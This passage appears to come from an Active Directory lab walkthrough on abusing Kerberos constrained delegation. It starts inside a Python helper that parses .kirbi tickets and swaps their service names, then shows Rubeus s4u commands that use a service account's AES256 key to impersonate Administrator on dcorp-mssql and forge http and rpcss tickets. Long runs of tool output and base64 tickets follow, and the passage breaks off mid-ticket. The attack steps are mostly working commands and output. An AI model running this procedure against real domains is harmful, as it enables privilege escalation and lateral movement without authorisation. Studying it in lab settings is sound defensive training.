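            "ticket_cipher": inner(inner(ticket, 3), 2),   # only dcorp-mssql$'s key opens this
            "session_key_type": int.from_bytes(inner(inner(info, 0), 0), "big"),
            "flags": flag_names(inner(info, 3)), "start": inner(info, 5).decode(),
            "end": inner(info, 6).decode(), "renew_till": inner(info, 7).decode()}

def substitute_service(b64, new_class):
    """Rubeus /altservice in miniature: swap the service class in both plaintext copies of the SPN
    (Ticket.sname and KrbCredInfo.sname) and re-encode; the encrypted part is not touched."""
    cred, ticket, info, enc, part = _parts(kirbi_bytes(b64))
    inner(inner(ticket, 2), 1)[0] = (0x1B, new_class.encode())   # 0x1B = GeneralString
    inner(inner(info, 9), 1)[0] = (0x1B, new_class.encode())
    field(enc, 2)[0] = (0x04, encode(part))                      # refresh the OCTET STRING
    return base64.b64encode(encode(cred)).decode()
```

parse_kirbi(KIRBI_CIFS) returns Administrator as the client, CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL as the service, the flags and times shown by klist above, etype 18 for the ticket and key type 17 for the session key; substitute_service(KIRBI_CIFS, "HTTP") returns a ticket of identical length whose only differences are the two SPN strings, and parsing it again shows the encrypted part is byte-for-byte the same. Paste any other base64 ticket from Rubeus or a .kirbi converted with base64 in place of KIRBI_CIFS; a KRB-CRED whose enc-part is really encrypted (etype other than 0) is rejected. The substitution only works across services that share a key: rewriting the host part as well produces a ticket the new host cannot decrypt. The practical defence is on the account side, since Protected Users membership and the "sensitive and cannot be delegated" flag stop the S4U2proxy ticket from being issued for those users in the first place.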

We use the /altservice flag in Rubeus to obtain service tickets for the host, http and rpcss classes. PowerShell Remoting (WinRM) authenticates against the HTTP SPN, so with those tickets we can access dcorp-mssql.dollarcorp.moneycorp.LOCAL through PowerShell Remoting.
C:\Windows\system32>C:\Ad\Tools\Rubeus.exe s4u /user:websvc /aes256:2d84a12f614ccbf3d716b8339cbbe1a650e5fb352edc8e879470ade07e5412d7 /impersonateuser:Administrator /msdsspn:CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL /altservice:http /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: S4U

[*] Using aes256_cts_hmac_sha1 hash: 2d84a12f614ccbf3d716b8339cbbe1a650e5fb352edc8e879470ade07e5412d7
[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\websvc'
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

doIF5jCCBeKgAwIBBaEDAgEWooIEvzCCBLthggS3MIIEs6ADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlD
T1JQLkxPQ0FMoi8wLaADAgECoSYwJBsGa3JidGd0Gxpkb2xsYXJjb3JwLm1vbmV5Y29ycC5sb2NhbKOC
BFswggRXoAMCARKhAwIBAqKCBEkEggRFAMfQd5EJnxCkmcPaAkuVQCBEo2/PzSMnpmvOcdCkqEB11rzz
UudA0RoEs2A8Jsiew/bh7G5BHIAiAsjLMEhI6njE3qtODpqNhovUrX7fjg+7Y0CtfSk4ckb+7CYIdlWu
wpbRM3t8lbI3Rnx0BaNxhRinCA5IZG328TNXF31drSBvslZg1SuHJoAUUSuLjKadzKUBfaJpFsZNF3Zi
z231jJlXEKkSzuS/HsTSLSc7YO8Gm8gsjFwHeuO7H45U6aiZ7bjCoo+9IDMPV9UqKMjN04KYHuenaYvq
+6NF9uE4E9zK1Hy+9KJIJ8MNyJx154dmqWToks1JjgiDR+mir7AC9BRvXbGlPLKoBIOIW2YQFDMJN8HA
9BcACysIPhlOYJb/eG2HLfPLAPzK0Kjsa3R4nc+ptaOmuMNshARnEaZyQ/WUCz0xDx54OA/n7Ngr/r66
6vLhLEaUSBaHYmJNaUYlIQH3vaZLgDLUaMV+OYd1tbK7cM0rbE8bqq1sUITdbTtXXH4He1Ts2uI/uQAD
haMOre8aBIW9FffwnsNTzxYJUjNJCWWyLzTGlSjT0ur+o68KZyHoJnDYENbeDBOYbbrCdQiI2nDQttg7
cuc683+lQwoy5xtr4iK2Suvs/paSEAxL4YBR8ZmGU/P9Xv+Bk7Z+xmfPJz41esNNLDUNdJG5OBsFUdLk
m/mAQH0q98MdSMhJRjLdyqVMlRRiGr9o9JsTlZ9I7Ia15u4emlMy2DLnP6CQB2TrtCwheZ5h86rDnSqA
b6j72l/5M2O82YH2HgoYSoSXyTScC/GYevS4N8ffK52yNNC7/pTZ+knuPWQCcvMLC/cjjD/W/KrWX67O
GCBV0gv+8Gga4XpNz49Qm6g/188C7h0efvFk8PbHX2NT3nbospjjbk8/H+nzO7GmIm0figJx5lQ5JDtX
sRudw3q+/gM+Yt3/uEiZZkif7V3uLNtQgUtYj1e+1WgbDgqZW/6uxmv05XWSLFM57f42NTp9z45xCt6g
BeOkECH5guSI0QcM+GeKVGr+qFb6Ncw9fMjAfbFVrv5J7z+yG5Wo3OyFGj+DN9k5TDqTy/MeeT7WeLyc
y+wSan7ebXW2iqh3MqwJO/HlKtWXNC0idetPfxm2KlSdv+dM5qc1jYpGvmTAtE5y7v3nR7cwL6XesWWf
+1oEY6XMZVeysuzIdphKqG6/nzP4WP2RhPjlTpqwciOsO4NdIzGdYN639obKMo3FDm7769dWVEfnZEYr
c8P9nQUcMZPPvFlhWFaBRAAehGu1xSnmuNnLEluSywVHQnT3tjSRdo4zfCbotsC4gtVz5iLSy99HjvmQ
J9jbVwOkJ4ywVEahfEdJ9j2qOY4umvfJDeCpgUBcDq3tTMwjtdGpY8jU7abDXy/0aPsJbuonQ3shLN8Z
jbM+sgFEeden/uH4HmIh1FTN2NS8xEB9D3IJNV9sMjGR61a8G6OCAREwggENoAMCAQCiggEEBIIBAH2B
/TCB+qCB9zCB9DCB8aArMCmgAwIBEqEiBCB4aprMuOUJ/nRBXrQ2XtmgViSczcw/xLcZYnNSbcTSeKEc
GxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKITMBGgAwIBAaEKMAgbBndlYnN2Y6MHAwUAQOEAAKUR
GA8yMDI0MDcwMzE2MTc1OVqmERgPMjAyNDA3MDQwMjE3NTlapxEYDzIwMjQwNzEwMTYxNzU5WqgcGxpE
T0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKkvMC2gAwIBAqEmMCQbBmtyYnRndBsaZG9sbGFyY29ycC5t
b25leWNvcnAubG9jYWw=

[*] Action: S4U

[*] Building S4U2self request for: 'websvc@DOLLARCORP.MONEYCORP.LOCAL'
[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Sending S4U2self request to 172.16.2.1:88
[+] S4U2self success!
[*] Got a TGS for 'Administrator' to 'websvc@DOLLARCORP.MONEYCORP.LOCAL'
[*] base64(ticket.kirbi):

doIGTDCCBkigAwIBBaEDAgEWooIFPjCCBTphggU2MIIFMqADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlD
T1JQLkxPQ0FMohMwEaADAgEBoQowCBsGd2Vic3Zjo4IE9jCCBPKgAwIBF6EDAgECooIE5ASCBOC4kuQT
BuEx7ZzAAiwKhSauDsR+US9Y9zpIvGTluAJIKYT1rAnaJzqniLwQXqWIgIyNrrVCdC3MdQ4HwpxyYALe
p6hJmMZdGLRH7ja5ZU2A471ZxV1m4LEQmu1r4aIHTXIe56Lub1u6xlDtu0FUClxWXSfBYF1yiBZN4d3o
U5xaXuZL1FSOY+/y5tP4xoDb6ENHL7twT/knZDYJMiOTEed/KzCSD1vmSB+hhD7yXVK3Yf9qY7lzyZ45
qIDkBA79VigKzHn4cbgLYgyAkAzl/fBm0XZln/AqKDRHRamF2UizNTEBCeLN6Jh0tyBF14mej3rGM5qO
271oNe3oxoDJGzjideX7vr4oN9aq4yWN54TASQ7jUkvPiBd+ijL1JcKW9eaC9Ox3k5OL/WexOLrEkSk4
SSSeU5mAor1W5h+I0IHdHSQXcajzpD29g/rl9M3qiQFaZc3hOS+4nCL0ER7DJ/mKyf2u4D8aoCh2nZkK
qyJ2YquXHp9cM2AGw/xU6ZYlhY1efns93/u0RhlpwMC6UpestmtpKKrwFIuKPr1e1Yv4uY6cMd+Kf4nC
yEOlRsePPH4UIeP/O/cCFL7g3EOgkVsVPn3hKf9FhG0ZzgHD6wRsGO5FdM8ySz6/h5yuZCEokjBEcVgr
kO9+AmObBv0qlzDl+q3GeF++jDAidm884CzI9T//FgOKxY4RZK5FU9dgkxikrS18gJSoYiw6z1zXXNhf
vecLBOr9gSeemxeza58qbaTEcw47TnuWecXqUsinF+Rlawv+vTntiAvEc3rOGh0/BezsnhnUxKnCcc9p
/K+PI04X5GK8h67d32ptPET9k54Tw9QDYeLVY/I7Jv6wr5vKPuy7KKuW41iYt7DtTKeMUHT14GpxJaq1
s7Y/ThLpTYBVxNbFIwlbYShB/b407lkh1RdyRRlwyS1fRcF54I4s40FxHBEsERnhEs3qUCL5E6Xtk83c
Cxq9kFBOTMvQuf0BDLX3DlrlPoef8LIEuUi7o+FGk29kij2r6O7Ko7iX9sy2Ub0tiaOYnSCx8tPWNL50
qNdLHqfexHFEG5PxI2ATycgcGp3XdNrQY3fo1+m38WmHpTMhkuyQrw2tnyy2z17AM1D6o0SngJqJx7oQ
zTvn5SQ/zsTXBw74Gzx4IaOU2ptNZJtheZ2ogw9kNwzDjOCShiLxTq2zcM4sREO5ku33garDNg2u59Cd
LN1w4gf8FY0/nbAQf6WrIUaEbf4vgVWGfjfJVg7aZv3RlD+/Yo+x4dvXsBMOyi60ruzNJT0IZntefjHM
y3C3dB6ENXGrPBQJia099ChmOYwUYrnJOiYI9UpoOQLKn8MaE4/FHafqosr8IrdxUpbmfSuvwdG3P7iR
DmsccwL4ebN5BFxnSVqD2AojgORSyHc+E7t6vupmHZwDrr0QZL/eF9DbUZMMK8KBtz0XYDAnsHsofg4B
B6iBtB+IaqPnH0FHnKrDgdXFQKDXeung0o7lBWkUVqYp2xS04+IlgrLFAlVL2Y3c4hi5dTnuCWXvKmLb
nlljGrdaWfe3A88cofkcIkJXdiwnKuHGQIpaJIeM1XKZkFHg+CMr+gNeDtB8R7UJvPE0Uw/8J91relli
FoV42Apyw4KS1ZO0FCSDNUq8PQmS1PfcYuS/QLFvPtY8GUkMAxD5ZaeHhQCjgfkwgfagAwIBAKKB7gSB
632B6DCB5aCB4jCB3zCB3KArMCmgAwIBEqEiBCD5u/j0mK39hSKQrRU6axdyUtYCYSXh0pqIEUvxLotz
j6EcGxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKIaMBigAwIBCqERMA8bDUFkbWluaXN0cmF0b3Kj
BwMFAEChAAClERgPMjAyNDA3MDMxNjE3NTlaphEYDzIwMjQwNzA0MDIxNzU5WqcRGA8yMDI0MDcxMDE2
MTc1OVqoHBsaRE9MTEFSQ09SUC5NT05FWUNPUlAuTE9DQUypEzARoAMCAQGhCjAIGwZ3ZWJzdmM=

[*] Impersonating user 'Administrator' to target SPN 'CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL'
[*] Final ticket will be for the alternate service 'http'
[*] Building S4U2proxy request for service: 'CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL'
[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Sending S4U2proxy request to domain controller 172.16.2.1:88
[+] S4U2proxy success!
[*] Substituting alternative service name 'http'
[*] base64(ticket.kirbi) for SPN 'http/dcorp-mssql.dollarcorp.moneycorp.LOCAL':

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
[+] Ticket successfully imported!

C:\Windows\system32>C:\Ad\Tools\Rubeus.exe s4u /user:websvc
/aes256:2d84a12f614ccbf3d716b8339cbbe1a650e5fb352edc8e879470ade07e5412d7
/impersonateuser:Administrator /msdsspn:CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL
/altservice:rpcss /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: S4U

[*] Using aes256_cts_hmac_sha1 hash: 2d84a12f614ccbf3d716b8339cbbe1a650e5fb352edc8e879470ade07e5412d7
[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\websvc'
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

doIF5jCCBeKgAwIBBaEDAgEWooIEvzCCBLthggS3MIIEs6ADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlD
T1JQLkxPQ0FMoi8wLaADAgECoSYwJBsGa3JidGd0Gxpkb2xsYXJjb3JwLm1vbmV5Y29ycC5sb2NhbKOC
BFswggRXoAMCARKhAwIBAqKCBEkEggRFE0OWSw3P0mcDk5VEpL+gNMdgwCySS8PbVNgvxE/l/AeSUyRR
VkY9jI9hpFdp7qe4sqTNE9BrsA5p9l12Vvp5fhs1gTosjqG3u3Bu3/V9oTOKI0TkRqg5nu8piBGXYNhJ
70OU2wtNpe2ItOF/9U/HQTfhGOGwj72E4AVJInl+HsaiU5tx3iY69rnFaamW7ENwTj5gSOEhHZtCse2u
wKatdgVOs4Llk1kNI0rgB7AxtQ6jicHx9lU0E0w9UJwHrRf8tQv4xx+hKOYYDZH3c85omT/DYtjjwKHM
atvtk87E48QFslOcXWtmrF3Y7ow2BjAscDPDOSj/2kNRTY/19ptWs70UxAoIUk3WjaPMl+9zlNDosFcL
wIxF47rztnDfREReqJ9fL4DDkQF5tyO8XE3naWh47JcUVAGyGgmm6v/S47ool2/vqBnrilURf50UDkH0
qQP6YjiiECFxymij8jeCV9C3ahprg4Zs4FEcrrp49NQaHezox+Gyipmchx6qBwU9snBMi8fQPPBVo5Ly
yPnRIdbcX/iukFwhRvh3XuHdzonBCZX2AQfi11DQsdSy9Te32U8IbBjvYVrcU7Qy+KvHsI71dSg5055L
1gsCEQAyaLJia8cnI3bGeb+QxQGwkPwpiTGe+WrgPQF+l4XRPdXP7DQ73ErCvCXE4rlZR+poWElireOD
CawsYGgdc3HdjmS0K/kd3+/2n2zl/RSshb7M2zy2jQU8tru2PZ4R0tI1A0ANBs4B7RDCqYyTWhedXcVn
8yeEW0+CGEpA5zExwNFCsH1TgBN6Fcaa0qY8GqjxcZkmo3jHu7bsEW/zOLu/+asoCPWzxk4PQ+oezE2c
wFfmsWOoz7EkkosHbP885Rbg2IjWM1AJw0TCoOBYWkkD0qAZP1bpt2Bfq/bwOSFuTIzGQFNF4Qiwp8XB
DMX3H/GPB/IwD7HyL3JgC8TF1gciAxpFGq+SFUbwIkifhrqX7u6a7cd90/Ot0CgTypUMceVi0U2gIQmZ
5vUZ7fiKgAKKhMHkRk7Mw1e4F8VX0JWn+GxMQMuT6nAo88X/YiA4nUk9Gto3kGJiFM5hUPhBQQAj2JY8
Q64NOPGoEvLeWr2SVamQSEYJ1TBlUIf4uss4jn9S1b5c3YPYFQLdVuZd8fSxUGIHuuWCvMgboTdUy66M
0ONKXwSnyvJsKsLIqSVZjgePF3v3HPJcHobqY6R+pmsfhfawuzC3/MZYxiVwBRFAKH6TLWc+NjXYa7aF
oOEdjdHOWGED6y7GajzcI1BIYeKFu2+C4sIEr12GSG5F0Nqqhcz8NYtdPAp8RAL+v6dCIyfkoZQ/HL13
4wm/8cupCPdbDrXG5dT01YPI+u54igHQ42IVF2B09UbJGbKvLix2OqHxENq0aWvtaVpPu6PhdFAup2+p
hqJHgGG/0Sqv8yKMBLy3VCNiWMwSR3UtCLZQ/ZQJKURMwwdluqOCAREwggENoAMCAQCiggEEBIIBAH2B
/TCB+qCB9zCB9DCB8aArMCmgAwIBEqEiBCCcxjaWpXFGvu3KFlcBjiKQxSwKj8Uabs0o4+HD4LAz/6Ec
GxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKITMBGgAwIBAaEKMAgbBndlYnN2Y6MHAwUAQOEAAKUR
GA8yMDI0MDcwMzE2MTgwN1qmERgPMjAyNDA3MDQwMjE4MDdapxEYDzIwMjQwNzEwMTYxODA3WqgcGxpE
T0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKkvMC2gAwIBAqEmMCQbBmtyYnRndBsaZG9sbGFyY29ycC5t
b25leWNvcnAubG9jYWw=

[*] Action: S4U

[*] Building S4U2self request for: 'websvc@DOLLARCORP.MONEYCORP.LOCAL'
[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Sending S4U2self request to 172.16.2.1:88
[+] S4U2self success!
[*] Got a TGS for 'Administrator' to 'websvc@DOLLARCORP.MONEYCORP.LOCAL'
[*] base64(ticket.kirbi):

doIGTDCCBkigAwIBBaEDAgEWooIFPjCCBTphggU2MIIFMqADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlD
T1JQLkxPQ0FMohMwEaADAgEBoQowCBsGd2Vic3Zjo4IE9jCCBPKgAwIBF6EDAgECooIE5ASCBOB2j3yU
l5qgZ2NxVjsfiY+sJpCeBsLsg7ZEDqQk/Pl7W/9ZpaN7BAitFJSDCOW2IxXSYheZR3zuDvwLHtQPi2PM
pWBZ/Zx62EKwvIY2QFP8h1EQg+6Pks2resejDpMGjlr65OvEXcTynB53JauY2+ZMs0M8Yuq220Z0WSnt
1iD9lnUaf5Lt4ww/U4QnZJuymFJq7/cqQUSjjsLizpj4/nBf51+Ie8sH+/4U0YRXbvqU+H6dGou+Yga5
RgEMjMlFFUK4O+s6euOU+CUR0MguF+s/evcjd+KvZHXbdQHKvlXdxiy4CKq6GcE9H7BAWO7AnMfOvI1R
lanJMiEEbTRZ4HmgbSmQJFgiF5r/j8DV75DnYpiSeQR2wVO4Cm4ojA0B7kFOOpKSbmne5YsHt45zv1mc
EouXSbbtH6BObgW3O0xRBU9Dn0x5g0eKXG+e1scuLBTYqMfVLpBOG0evYZH+bOgSchCl21qm6R9CE+Ed
J3lnnTI77SviX/Y674LqkM29fqtyz9iQ70oLxC3Mj465bjQhgHL0/ritzp97OPZ1TApwAlvwv++CVJou
Ps9beSD0Flj2GVZHufYX3okLxmN3S/g4I7uG8QqAYGKdYoUtvhDlSvHw+zTo3dnmlxv1MDTu8FpbOVxU
DrnzTqmt7ZAfApdfvk+9sNL0lIwVbRJHA7zT4sAuOlrVE7nG9yuvZiMyATAkl4KtkYnIrm9T6bCglBsX
Mzr3QjjrLr2hxsyCl4wZ5IDEwSKdJSEkKNBCOK+5Ye/faogXL8H2ySlZxQKiow7hy+weCnsvyU5Jhdhq
IX3Qlzu2dbFLitf88gyhEP5nq+T32JbNQt47Q78GePHaFYHRFIHvsdz1PMEEswEuh1x7sV2K41bLFfw+
xPd18wMgZLqtykYriaGaBtXoR5wsPkxWTW0S9JPK8XRL7aCPRwTuQCQq8QtlkMJWjGOojTKLf9mMo/Ig
KeVWnGfsYGEhPC7Y81YSq0aJpDdkZFzviEjhALM5TmZsFqcecH5JD+lAzpMBcX0FzK9zrP9jgvalRnxF
aXxtboODsRV2F6vAuXqFbJaIQlQB5octyHpdY7DL06RdqNXNQ4EmmuucmIjAqFtfIAVPk8YN3lusEHeP
JNO7ol7whQiBd4OZZLD6R7M+uglkPOQJXz/raYSlqrvtW1U2NZx5I3gLPSmcCnLFVh2SrHz4u9rXQz2m
ZsmdqfUwmxeXRjOFH128Y5oMZcuDxZAPCVcmVPFuTuB9SX+YBebe5V8Y4dPRC0X71Pa7Sj155O7zaQG2
9FBLCfF/n3hv8WzdL2Qv27zWXvdW7Ze1PNGyH9D1WY/7uEaiTwwG9Kg8DZOqBXaNJyYXa0au0vKLk4Yk
cOZB9WKPbQji6xBrJjpP/Rn1t8Avq0yAKOXf5ipH69bN5HAfHEorFLx5MEwN53H46vcDCBNHEL2BPE4d
yDOQr8SjBZpUPWsr5i46hn5U3SiqeaCsfodlqiSOd0tPsy6hRNQknBD2cr05ZHyc9YF9pgAaWBIIdcXc
pCjsq0x0dTRaVP1NhqYo2dAvyxIsRPVLkXJTWsKa5M4v3dUGqNTPFpQD07+VwSsuUjvaRoPzJwtWDvaS
YUpHRC0ecxAVcYGIFqr62/d5QUJcBHP278XT7tE5WqqoHKuWX71j+TDyFfWjgfkwgfagAwIBAKKB7gSB
632B6DCB5aCB4jCB3zCB3KArMCmgAwIBEqEiBCCLK9zxPtRO5KVHMZ07G0ZiWXjlru2oBp5l5141hYyg
J6EcGxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKIaMBigAwIBCqERMA8bDUFkbWluaXN0cmF0b3Kj
BwMFAEChAAClERgPMjAyNDA3MDMxNjE4MDdaphEYDzIwMjQwNzA0MDIxODA3WqcRGA8yMDI0MDcxMDE2
MTgwN1qoHBsaRE9MTEFSQ09SUC5NT05FWUNPUlAuTE9DQUypEzARoAMCAQGhCjAIGwZ3ZWJzdmM=

[*] Impersonating user 'Administrator' to target SPN 'CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL'
[*] Final ticket will be for the alternate service 'rpcss'
[*] Building S4U2proxy request for service: 'CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL'
[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Sending S4U2proxy request to domain controller 172.16.2.1:88
[+] S4U2proxy success!
[*] Substituting alternative service name 'rpcss'
[*] base64(ticket.kirbi) for SPN 'rpcss/dcorp-mssql.dollarcorp.moneycorp.LOCAL':

doIHcjCCB26gAwIBBaEDAgEWooIGSTCCBkVhggZBMIIGPaADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlD
T1JQLkxPQ0FMojowOKADAgECoTEwLxsFcnBjc3MbJmRjb3JwLW1zc3FsLmRvbGxhcmNvcnAubW9uZXlj
b3JwLkxPQ0FMo4IF2jCCBdagAwIBEqEDAgEBooIFyASCBcTo3UH370WHJdiHXKFHpml1g9KtBq2l0xUU
S04EgWVjWtBImzjj10VvZlSO2fvAETetVqog8boL4jGnE83lnC0GgJMvXqbEFHNPEEea7F70ELcL5WR8
sAnWmHPMbk0VwR1LrpMWvk9xSWiM70YKPwgIu6tVKVnJ+agHxFRPyL+YhCDlyd/uKlH0o/n3la1TI4+c
UPrStfcTx53xL5KRtncY5Wm9IL8tdGkx5wNfP4sbP2XWQ0upfhpRpau4tiQcgvOQQ/pLPskVltbV9OOA
Z16fVcyMehgygUXKncyJJ3Z0qilAkjNhwRjzyB6gMYzt4NdlYbmXv7/dxaSxoUrWbq5G8u6sw6PKZWin
r8Nk8+Dthr2HvWte1opMdfGETOo7wNrUE3lhzJAMXbtPWY0EhzolkjqNBYFg1C3ZO0pP2O/ANpupayfL
3F2hYSl6zD67Dy/rv/W7qYBFmgK+cPOVi4HI2p2jE5+ajv3tvhpz5xeAaxb88h0lV2WgR4heca2/fQmm
247ZVqN3GOVwdi5gYYgbJLaznVYi7+SZqqRoaLgMU8hsWRJl/Sq8Havydni6v4Dp7SeWE/Krt2QwrqBq
hr5uir1yNdZ+0w9HGaMDePkRk8mW44K52u2Mkfd7yvEKnqwlzcUXnLczlDqUarWAkueMtw3HZXIIhCsy
PtMs/jP2EOSbx61obJ6UFh/LrAoOwsp3f8+gHBELeV/jbcSrpPAC1vX5noa/EnDLnh3CpW3NZyjH48Ky
Ed/1gVPyPUdeIEfS0fgm7UnPMKB3dvCNE8yHLCRDMW++Vxitmi4YGl0xhxoAd6cUj1B7pG7pogo7lnsS
fsm1ZfGj1/vuY+NRms7/FDIcUpKiJoXcAiPsYFWP0PkUJvpXCH0rKjfyAfE1ROqqhZXdvx18IhTkMBLF
2lntoQLeIzg2kjVHRhVQpBx5pl0hb36ofBAxKmTMVfbkVwwYkNo6h2/psWjugRd3MIjhumGT2uFjALGw
bWiYJwxu7pmXJVBFwzZOKUdHisO+YoA0DJoolkKE/fCb7QHY5CgedW6fTEOL8ZsumQtDx97U1PLM2WRo
vz0ibgaINYm1VjfUGOz9ec+nIFguCtD4d+2w6EdtQCZgOZ1JWwL+75coQ36MQP9WCmaqofbjIWZKilfa
BuKaS2LifGMTu+GCd3qrOuVgDrPu38W6+F60TYDKeV4YHbs+HxPcwvfVfe03QHc4XhvtM2X/MJu6NbSL
+0Qt521DUJKHEE6pDH+wK1lhc/L6U60P0hRtqv2CJbDX16y0CE3RIciGeUE4GHIf28BDaWzjC1MJ0QZD
9dkHnJYUTm9KkcqZixViN93CFjwvcwYVZXNh5I1XmLqjy6bjNY5fx2uXdWJSAwie8gqfYX5VQ6/AnTz0
9nhaKQJEOkOGvUUUzQHydD3h4UNQqjZ5FjLmSXi7rQKnhIYiwGjz8G6y03gVWYh1FbBipPyP3GaLeQ2i
tI9v3v7t+fmY3KS/jOPwOAz9ExlRxiKLJusRJ+tnBtuCKoSTkPX40DYvkESdahn2KDaxWWLTJREmngqo
